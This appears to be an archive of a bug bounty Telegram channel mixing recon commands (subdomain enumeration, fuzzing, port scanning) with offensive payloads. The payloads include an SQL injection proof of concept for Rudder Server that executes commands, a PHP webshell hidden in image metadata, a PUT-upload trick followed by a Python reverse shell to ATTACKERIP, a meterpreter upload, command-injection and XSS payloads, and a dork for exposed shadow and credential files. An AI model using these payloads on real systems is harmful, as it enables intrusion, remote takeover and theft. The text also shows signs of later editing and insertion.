Bug bounty Tips


🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

5 905 subscribers

Posts archive
Rudder Server < 1.3.0-rc.1 - SQL Injection (CVE-2023-30625)

```http
POST /v1/warehouse/pending-events HTTP/1.1
Host: {{Hostname}}

{"source_id": "test'; copy (SELECT '') to program 'id'-- - "}
```

✔️ Complete Bug Bounty tool list ✊ Enjoy :)

• dnscan https://github.com/rbsec/dnscan
• Knockpy https://github.com/guelfoweb/knock
• Sublist3r https://github.com/aboul3la/Sublist3r
• massdns https://github.com/blechschmidt/massdns
• nmap https://nmap.org
• masscan https://github.com/robertdavidgraham/masscan
• EyeWitness https://github.com/ChrisTruncer/EyeWitness
• DirBuster https://sourceforge.net/projects/dirbuster/
• dirsearch https://github.com/maurosoria/dirsearch
• Gitrob https://github.com/michenriksen/gitrob
• git-secrets https://github.com/awslabs/git-secrets
• sandcastle https://github.com/yasinS/sandcastle
• bucket_finder https://digi.ninja/projects/bucket_finder.php
• GoogD0rker https://github.com/ZephrFish/GoogD0rker/
• Wayback Machine https://web.archive.org
• waybackurls https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050
• Sn1per https://github.com/1N3/Sn1per/
• XRay https://github.com/evilsocket/xray
• wfuzz https://github.com/xmendez/wfuzz/
• patator https://github.com/lanjelot/patator
• datasploit https://github.com/DataSploit/datasploit
• hydra https://github.com/vanhauser-thc/thc-hydra
• changeme https://github.com/ztgrace/changeme
• MobSF https://github.com/MobSF/Mobile-Security-Framework-MobSF/
• Apktool https://github.com/iBotPeaches/Apktool
• dex2jar https://sourceforge.net/projects/dex2jar/
• sqlmap http://sqlmap.org/
• oxml_xxe https://github.com/BuffaloWill/oxml_xxe/
• XXE Injector https://github.com/enjoiz/XXEinjector
• The JSON Web Token Toolkit https://github.com/ticarpi/jwt_tool
• ground-control https://github.com/jobertabma/ground-control
• ssrfDetector https://github.com/JacobReynolds/ssrfDetector
• LFISuite https://github.com/D35m0nd142/LFISuite
• GitTools https://github.com/internetwache/GitTools
• dvcs-ripper https://github.com/kost/dvcs-ripper
• tko-subs https://github.com/anshumanbh/tko-subs
• HostileSubBruteforcer https://github.com/nahamsec/HostileSubBruteforcer
• Race the Web https://github.com/insp3ctre/race-the-web
• ysoserial https://github.com/GoSecure/ysoserial
• PHPGGC https://github.com/ambionics/phpggc
• CORStest https://github.com/RUB-NDS/CORStest
• Retire-js https://github.com/RetireJS/retire.js
• getsploit https://github.com/vulnersCom/getsploit
• Findsploit https://github.com/1N3/Findsploit
• bfac https://github.com/mazen160/bfac
• WPScan https://wpscan.org/
• CMSMap https://github.com/Dionach/CMSmap
• Amass https://github.com/OWASP/Amass
• Extra Tools http://projectdiscovery.io

Step 1: Subdomain Enumeration
• DNS Dumpster
• Sublist3r
• Amass
• Google Dorking
• Certificate Transparency Logs
• subdomainer

Step 2: Find Live Domains
```bash
cat all-domains.txt | httpx > all-live.txt
```

Step 3: Identify All URLs
```bash
cat all-live.txt | gauplus -subs -b png,jpg,gif,jpeg,swf,woff,gif,svg -o allUrls.txt
```

Step 4: Inject the Burp Collaborator URL into Parameters
```bash
cat /home/casperino/tools/nuclei/httpx.txt | grep "=" | ./qsreplace 40ga7gynfy6pcg06ov.oastify.com > ssrf.txt
```

Step 5: Test for SSRF Vulnerabilities
```bash
cat ssrf.txt | httpx -fr
```

Step 6: How to check which URL is vulnerable
```bash
split -l 10 ssrf.txt output_file_
```

Guys, I am planning a free workshop this Sunday. Which topic should I choose?

```bash
cat httpx.txt | aquatone -scan-timeout 3000 -threads 5 -silent -screenshot-timeout 50000 -http-timeout 20000 -out screenshots-folder
```

```bash
# The post shows only the loop body and its closing "done"; the loop over a file of
# domains (assumed here to be domains.txt) is reconstructed so the snippet runs.
while read -r line; do
  echo "$line" | waybackurls | qsreplace | grep "=" \
    | parallel -j50 -q curl -Isk --max-time 2 -w '%{url_effective}' \
    | grep -iE "Location" | sed -e 's!Location:!!' | httpx -status-code
done < domains.txt
```

Content Discovery: Dirsearch
```bash
sudo dirsearch -u "target.com" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x 403
# the authenticated run needs -H in front of the header
sudo dirsearch -u "target.com/access/reset" -H "Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiI5NjgxODU2NS04ZDlmLTRkMTQtOGNlMi1iYzgwYzE5ZWFlZWQiLCJhdWQiOiJBQ0NFUYtZjY0MmRkY2U0MzY0In0sImV4cCI6MTcwNjI1NTM2OX0.mJafEz4lSaB1gi-o58_BHdqA2gm0pIWPLlMq1ga4pdw" -x 403
sudo dirsearch -u "target.com" -w /home/SecLists-master/Discovery/Web-Content/common.txt -r -x 403 -o dir.txt
```

Content Discovery: Introduction to FFUF
```bash
ffuf -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/raft-large-words.txt -u https://target.com/d/setting/FUZZ -t 50 -ac -c
ffuf -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/raft-large-words.txt -u www.target.com/FUZZ -t 75
ffuf -u "https://target.com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -o ffuf.txt
python3 ffuf-json.py
ffuf -u "https://target.com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt | tee dir.txt
ffuf -u "https://target.com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -fs 162,0
ffuf -u "https://target.com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -fs 162,0 -mc all
ffuf -u "https://target.com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -fs 162,0 -mc all -fc 404
ffuf -u "target.target.com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -ac
ffuf -u "https://target.com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -ac -fs 0 -fl 1
ffuf -u "https://target.com/access/reset/FUZZUser" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt
ffuf -u "https://target.com/access/resetFUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -fc 403
ffuf -u "target.com/access/reset/F…" -w /home/SecLists-master/Discovery/Web-Content/common.txt -H "Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiI5NjgxODU2NS04ZDlmLTRkMTQtOGNlMi1iYzgwYzE5ZWFlZWQiLCJhdWQiOiJBQ0NFU1MiLCJpc3MiOiJBQ0NFU1MiLCJwYXlsb2FkIjp7ImxvZ2luIjpudfdXNlcm5hbWUiOm51bGwsImxhc3Rfc2F2ZWRfdXNlcm5hbWUiOm51bGwsImNvcnJlbGF0aW9uX2lkIjoiZjdlMjQ4ZjAtNDY3ZS00OTA5LTg2YWYtZjY0MmRkY2U0MzY0In0sImV4cCI6MTcwNjI1NTM2OX0.mJafEz4lSaB1gi-o58_BHdqA2gm0pIWPLlMq1ga4pdw" -H "Test:admin"
```

Passive Enumeration: GetAllUrls
```bash
echo "https://target.com" | gau
echo "target.target.com/access/reset" | gau > gau.txt
echo "target.com" | getallurls | sort -u | grep -v www > gau.txt
# only parameterised URLs, without duplicates
cat gau.txt | grep "=" | sort -u
```

Passive Enumeration: Waybackurls
```bash
echo "www.target.com" | waybackurls > gau.txt
echo "https://target.com" | gau > gau.txt && echo "target.com" | waybackurls > way.txt && cat gau.txt | grep "=" | sort -u > sorted.txt
katana -u "https://uber.onelogin.com/" -jc -d 4 -o katana-uber.txt
python3 cloudflair.py glassdoor.com
```

hakrawler
```bash
# Single URL
echo https://google.com | hakrawler
# Multiple URLs
cat urls.txt | hakrawler
# Timeout for each line of stdin after 5 seconds
cat urls.txt | hakrawler -timeout 5
# Send all requests through a proxy
cat urls.txt | hakrawler -proxy http://localhost:8080
# Include subdomains
echo https://google.com | hakrawler -subs
echo google.com | haktrails subdomains | httpx | hakrawler
echo www.google.com | docker run --rm -i hakluke/hakrawler:v2 -subs
echo www.google.com | docker run --rm -i hakluke/hakrawler -subs
```

hakoriginfinder
```bash
# <ip-range> is a placeholder: the range to compare against the origin was garbled in the post
prips <ip-range> | hakoriginfinder -h https://example.com:443/foo
prips 1.1.1.0/24 | hakoriginfinder -h one.one.one.one:80/index.html -p 80,443,8080,8443
```

xnLinkFinder
```bash
python3 xnLinkFinder.py -i redbull.com -sp redbull.com -sf redbull.* -d 3 | unfurl keys | sort -u
```

🚀🚀 DISCOVERING DOMAIN 🔥🔥🔥🔥 #DAY11

Look for the ASN:
• bgp.he.net/search
• dnslytics.com/dns-lookup
• whoxy.com

AMASS
```bash
sudo amass enum -brute -d www.target.mil -o target.txt -p 80,443,8080,8443,8000
sudo amass enum -active -brute -d www.target.mil -o target.mil.txt -p 80,443,8080,8443,8000
amass enum -v -src -ip -brute -min-for-recursive 2 -d target.com
```

Amass ASN
```bash
amass intel -org "TARGET" -v
amass intel -asn 205952 -o asn.txt -v
amass enum -d target.com -o subdomains.txt -v
```

Subdomain Enumeration: Subfinder
```bash
subfinder -d target.com -o domain.txt
subfinder -d target.com -sources securitytrails
# count how many domains were found
wc -l domain.txt
```

Subdomain Enumeration: AMASS (filtering the output)
```bash
cat amass_subdomains.txt | grep "target.com"
cat amass_subdomains.txt | grep -o "target.com"
cat ssrf-uber1.txt | grep -Eo "([a-zA-Z0-9.-]+\.)*uber\.com"
cat amass_subdomains.txt | grep -Eo "([a-zA-Z0-9.-]+\.)*hackerone\.com"
```

Subdomain Bruteforcing: wordlists
• /usr/share/seclists/Discovery/DNS
• /home/casperino/Desktop/best-dns-wordlist.txt

Subdomain Bruteforcing: FFuF
```bash
ffuf -u "http://FUZZ.target.com" -w /home/Desktop/best-dns-wordlist.txt -t 50
```

Subdomain Bruteforcing: GoBuster
```bash
gobuster dns -d target.com -w /home/Desktop/best-dns-wordlist.txt
```

Subdomain Bruteforcing: AMASS
```bash
amass enum -d target.com -brute -w /home/Desktop/best-dns-wordlist.txt -v
```

Subdomain Bruteforcing: PureDNS
```bash
puredns bruteforce /home/Desktop/best-dns-wordlist.txt target.com --resolvers resolvers.txt
```

Subdomain Enumeration: VHOST
```bash
# first map the target to its IP in /etc/hosts, e.g. "192.168.1.1 target.com"
sudo nano /etc/hosts
ffuf -u "http://target.com" -H "Host: FUZZ.target.com" -w /home/Desktop/best-dns-wordlist.txt
```

Combining Tools
```bash
amass enum -d target.com -o amass.txt -nocolor -v
cat amass.txt | grep -Eo "([a-zA-Z0-9.-]+\.)*sony\.com"
cat amass.txt | grep -Eo "([a-zA-Z0-9.-]+\.)*sony\.com" > amass_new.txt
sudo bash -c "cat amass.txt | grep -Eo '([a-zA-Z0-9.-]+\.)*sony\.com' > amass_new.txt"
subfinder -d target.com -o subfinder.txt -v
cat amass_new.txt subfinder.txt | sort -u > sorted.txt
sudo bash -c "cat amass_new.txt subfinder.txt | sort -u > sorted.txt"
cat amass_new.txt subfinder.txt > new.txt
sudo bash -c "cat amass_new.txt subfinder.txt > new.txt"
wc -l new.txt
wc -l sorted.txt
# everything in one go
amass enum -d target.com -o amass.txt -nocolor -v | grep -Eo "([a-zA-Z0-9.-]+\.)*sony\.com" > amass2.txt && subfinder -d target.com -o subfinder.txt && cat amass2.txt subfinder.txt | sort -u > sorted.txt
sudo bash -c "amass enum -d target.com -o amass.txt -nocolor -v | grep -Eo '([a-zA-Z0-9.-]+\.)*sony\.com' > amass2.txt && subfinder -d target.com -o subfinder.txt && cat amass2.txt subfinder.txt | sort -u > sorted.txt"
amass enum -d target.com -o amass.txt -nocolor -v && subfinder -d target.com -o subfinder.txt && cat amass.txt subfinder.txt | sort -u > sorted.txt
```

Filtering Live Subdomains
```bash
cat subdomain2.txt | httpx -o http.txt
cat subdomain2.txt | httpx -o http.txt -title
```

Finding the Origin IP Address (1): only with Cloudflare
• search.censys.io/hosts/34.120.2…
```bash
ping bepractical.tech
whois bepractical.tech
python3 cloudflair.py bepractical.tech
```

Finding the Origin IP Address (2)
• securitytrails.com/domain/www.air…

Port Scanning with NMAP
```bash
sudo nmap -sF <target>
sudo nmap -sN -sS -vv <target>
nmap -iL mil-domains.txt -p80,443,8080,8000,8443,1000
sudo nmap -sV -sC -p- 154.56.61.191 -vv
sudo nmap -sV -sC -p- 154.56.61.191 -vv -T5
```

Vulnerability Scanning with NMAP
```bash
sudo nmap -sV -sC -p 80 154.56.61.191 --script=vuln -vv -T5
nmap --script vulners -sV 192.168.0.0
```

Port Scanning with NAABU
```bash
# -top-ports needs a value; 100 is naabu's default set
naabu -l subfinder.txt -o port.txt -top-ports 100 -v
```

Content Discovery: Basics of Dirsearch
```bash
sudo dirsearch -u "target.com"
sudo dirsearch -u "target.com" -x 403,301
sudo dirsearch -u "target.com" --exclude-status=403,401
```


💫 CipherOps said YES to our journey together! Embarking on a path filled with innovation, growth, and shared success. ❤️🚀 #DreamsComeTrue

```bash
grep -o '^[^#]*' file.txt | awk -F' ' '{print $2}' | sed -e 's/^[^.]*\.//'
```

Program has "All in scope" in their policy? Use this checklist 📋 to collect a list of root domains:

✅ Inspect the footer of their pages. Sometimes companies like to use the same footer across all their domains. For example: "© 2024 The Coca-Cola Company. All rights reserved." could be used as a "The Coca-Cola Company. All rights reserved." dork on Google!

✅ Check the organisation name on the SSL certificate. Copy it to http://crt.sh and Shodan. For example, to query "The Coca-Cola Company" via the http://crt.sh CLI:
```bash
curl -s "https://crt.sh/?q=The+Coca-Cola+Company&output=json" | jq -r '.[] | .common_name' | sort -u
```
NOTE: Some domains could be very old, outdated or already belong to another company, so make sure to inspect them manually.

✅ For Shodan, use org:"The Coca-Cola Company" or ssl:coca-colacompany.com to check the assets. Inspect the hostnames in the Shodan query response and collect them into your list.

✅ For FOFA https://en.fofa.info, place the company name in the search bar, for example "The Coca-Cola Company". Select the favicons of your company and filter the results. You could also copy those favicon values to Shodan search and use favicon:"<value>" as the Shodan dork.

#BugBounty #bugbountytip #itsecurity
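An added helper (not from the post) for the post-processing the curl | jq one-liner above leaves to manual inspection: it reads a crt.sh JSON response, collects the common name and every SAN line from name_value, strips wildcards, drops certificates that have already expired (the "very old, outdated" entries the note warns about), and groups what remains by root domain. The sample response is constructed; the field names are the ones crt.sh's JSON output uses.

```python
import json
from datetime import datetime, timezone

# Constructed sample in the shape crt.sh returns for ?output=json (only the
# fields used here: common_name, name_value, not_after). Not real data.
SAMPLE_CRTSH_JSON = json.dumps([
    {"common_name": "www.example.com",
     "name_value": "www.example.com\nexample.com",
     "not_after": "2030-01-01T00:00:00"},
    {"common_name": "*.shop.example.com",
     "name_value": "*.shop.example.com\nshop.example.com",
     "not_after": "2030-06-01T00:00:00"},
    {"common_name": "old.example.org",          # expired certificate: dropped
     "name_value": "old.example.org",
     "not_after": "2019-03-01T00:00:00"},
    {"common_name": "mail.example.net",
     "name_value": "mail.example.net\nexample.net",
     "not_after": "2031-01-01T00:00:00"},
])


def root_of(hostname):
    """Naive registrable-domain guess: the last two labels. Fine for .com/.org/.net,
    wrong for two-level public suffixes such as co.uk (use the Public Suffix List there)."""
    labels = hostname.split(".")
    return ".".join(labels[-2:])


def parse_crtsh(raw_json, now=None):
    """Return (root_domains, hostnames) found in a crt.sh JSON response.

    Both common_name and each SAN line in name_value are collected, wildcard
    prefixes are stripped, and certificates whose not_after is in the past are
    skipped, since crt.sh keeps expired certificates too."""
    now = now or datetime.now(timezone.utc).replace(tzinfo=None)
    hostnames = set()
    for entry in json.loads(raw_json):
        if datetime.fromisoformat(entry["not_after"]) < now:
            continue
        names = [entry.get("common_name", "")] + entry.get("name_value", "").split("\n")
        for name in names:
            name = name.strip().lower().lstrip("*.")
            if name and " " not in name:
                hostnames.add(name)
    roots = {root_of(h) for h in hostnames}
    return sorted(roots), sorted(hostnames)


if __name__ == "__main__":
    roots, hosts = parse_crtsh(SAMPLE_CRTSH_JSON)
    print("root domains:", roots)
    print("hostnames:", hosts)
```

Feed it the output of the curl command (with jq removed) and review each root domain by hand before adding it to scope.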

🚀 Exciting News! 🚀 I've just conquered the Twister machine in my OSCP journey! #Day7 🕵️‍♂️💻 👨‍💻 Now I'm sharing my code and notes to help you! 🎯 🔗 Check out

Nmap
```bash
nmap -p- -sT -sV -A $IP
nmap -p- -sC -sV $IP --open
nmap -p- --script=vuln $IP
# HTTP methods
nmap --script http-methods --script-args http-methods.url-path='/website' $IP
# extract IPs from a file (each octet limited to 0-255)
grep -oE '((1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.){3}(1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])' FILE
# SMB shares
nmap --script smb-enum-shares $IP
```

WPScan & SSL
```bash
wpscan --url $URL --disable-tls-checks --enumerate p --enumerate t --enumerate u
# WPScan brute forcing
wpscan --url $URL --disable-tls-checks -U users -P /usr/share/wordlists/rockyou.txt
# aggressive plugin detection
wpscan --url $URL --plugins-detection aggressive --enumerate p
```

Nikto with SSL and evasion
```bash
nikto --host $IP -ssl -evasion 1   # see nikto's help for the evasion modes
```

dnsrecon
```bash
dnsrecon -d yourdomain.com
```

gobuster
```bash
# directories
gobuster dir -u $URL -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt -k -t 30
# files
gobuster dir -u $URL -w /opt/SecLists/Discovery/Web-Content/raft-medium-files.txt -k -t 30
# subdomain brute forcing
gobuster dns -d domain.org -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 30
```
Just make sure any DNS name you find resolves to an in-scope address before you test it!

Extract IPs from a text file
```bash
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' nmapfile.txt
```

Wfuzz
```bash
# XSS fuzzing
wfuzz -c -z file,/opt/SecLists/Fuzzing/XSS/XSS-BruteLogic.txt "$URL"
wfuzz -c -z file,/opt/SecLists/Fuzzing/XSS/XSS-Jhaddix.txt "$URL"
# command injection with POST data
wfuzz -c -z file,/opt/SecLists/Fuzzing/command-injection-commix.txt -d "doi=FUZZ" "$URL"
# test for parameter existence
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/burp-parameter-names.txt "$URL"
# authenticated directory fuzzing (the session is sent as POST data here, as in the
# original notes; to send it as a cookie instead use -b "SESSIONID=value")
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt --hc 404 -d "SESSIONID=value" "$URL"
# authenticated file fuzzing
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-medium-files.txt --hc 404 -d "SESSIONID=value" "$URL"
# fuzz directories
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "$URL"
# fuzz files
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-files.txt --hc 404 "$URL"
```

📚 Learn, practice, and let's achieve OSCP success together! 💪🏆 #OSCP #Cybersecurity #EthicalHacking #TwisterMachine #InfoSec #GitHub #LearnToHack

🔍 Searching for sensitive files on the web? Here's a Google dork to find filenames that might contain sensitive information. Use it responsibly! #InfoSec #Security #GoogleDork #bugbountytips

🔍 Google dork for searching these filenames on Google:

intext:"filename:config.php" OR intext:"filename:config.inc.php" OR intext:"filename:prod.secret.exs" OR intext:"filename:configuration.php" OR intext:"filename:.sh_history" OR intext:"filename:shadow" OR intext:"filename:proftpdpasswd" OR intext:"filename:.psafe3" OR intext:"filename:.pgpass" OR intext:"filename:manifest.xml" OR intext:"filename:travis.yml" OR intext:"filename:vim_settings.xml" OR intext:"filename:database" OR intext:"filename:prod.exs" OR intext:"filename:prod.secret.exs" OR intext:"filename:.npmrc _auth" OR intext:"filename:.dockercfg" OR intext:"filename:WebServers.xml" OR intext:"filename:.bash_history" OR intext:"filename:sftp-config.json" OR intext:"filename:sftp.json" OR intext:"filename:secrets.yml" OR intext:"filename:.esmtprc" OR


Attachment: Hydra - Brute Force Password.pdf (2.37 MB)

My own discussion channel do join https://t.me/bug_hunting_talks

400 followers for today ❤️❤️🥳🥳🥳

🚀🤌 Bug Bounty Tips!!! 🔥🔥 Quick tricks

```bash
# Web ports for nmap
80,81,300,443,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5800,6543,7000,7396,7474,8000,8001,8008,8014,8042,8069,8080,8081,8083,8088,8090,8091,8118,8123,8172,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9043,9060,9080,9090,9091,9200,9443,9800,9981,10000,11371,12443,16080,18091,18092,20720,55672

# Technology scanner
# github.com/urbanadventure…
whatweb https://url.com

# Screenshot web
# github.com/maaaaz/webscre…
# github.com/sensepost/gowi…
# github.com/michenriksen/a…

# Get an error with this input
%E2%A0%80%0A%E2%A0%80

# Retrieve additional info:
/favicon.ico/..%2f
/lol.png%23
/../../../
?debug=1
/server-status
/files/..%2f..%2f

# Change default header to accept */*
Accept: application/json, text/javascript, */*; q=0.01

# Sitemap to wordlist (httpie)
http target.com/sitemap.xml | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g' > wordlist_endpoints.txt

# Bypass Rate Limits:
# Use different params: sign-up, Sign-up, SignUp
# Null byte on params: %00, %0d%0a, %09, %0C, %20, %0

# Bypass upload restrictions:
# Change extension: .pHp3 or pHp3.jpg
# Modify mimetype: Content-type: image/jpeg
# Bypass getimagesize():
exiftool -Comment='"; system($_GET['cmd']); ?>' file.jpg
# Add gif header: GIF89a;
# All at the same time.

# ImageTragic (memory leaks in gif preview)
# github.com/neex/gifoeb
./gifoeb gen 512x512 dump.gif
# Upload dump.gif multiple times, check if preview changes.
# Check docs for exploiting

# If upload from web is allowed or :
# medium.com/@shahjerry33/p…
# iplogger.org/invisible/
# iplogger.org/15bZ87

# Check HTTP options:
# Check if it is possible to upload
curl -v -k -X OPTIONS https://10.11.1.111/
# If PUT is enabled, upload:
curl -v -X PUT -d '' http://10.11.1.111/test/shell.php
nmap -p 80 192.168.1.124 --script http-put --script-args http-put.url='/test/rootme.php',http-put.file='/root/php-reverse-shell.php'
curl -v -X PUT -d '' http://VICTIMIP/test/cmd.php && http://VICTIMIP/test/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22ATTACKERIP%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
curl -i -X PUT -H "Content-Type: text/plain; charset=utf-8" -d "/root/Desktop/meterpreter.php" http://VICTIMIP:8585/uploads/meterpreter.php
# If PUT is not allowed, try to override:
X-HTTP-Method-Override: PUT
X-Method-Override: PUT

# Retrieve endpoints
# LinkFinder
# github.com/GerbenJavado/L…
python linkfinder.py -i example.com -d
python linkfinder.py -i burpfile -b

# Retrieve hidden parameters
# Tools
# github.com/s0md3v/Arjun
python3 arjun.py -u url.com --get
python3 arjun.py -u url.com --post
# github.com/maK-/parameth
python parameth.py -u example.com/test.php
# github.com/devanshbatham/…
python3 paramspider.py --domain example.com
# github.com/s0md3v/Parth
python3 parth.py -t example.com

# .DS_Store files?
# github.com/gehaxelt/Pytho…
python main.py samples/.DS_Store.ctf

# Polyglot RCE payload
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}

# Nmap web scan
nmap --script "http-*" example.com -p 443

# SQLi + XSS + SSTI
'"><svg/onload=prompt(5);>{{7*7}}
# '                         ==> for SQL injection
# "><svg/onload=prompt(5);> ==> for XSS
# {{7*7}}                   ==> for SSTI/CSTI

# Try to connect with netcat to port 80
nc -v host 80

# Understand URL params with unfurl
# dfir.blog/unfurl/
```

Penetration Testing Cheatsheet 🔥🔥 Share and Support US: https://t.me/bugbounty_tech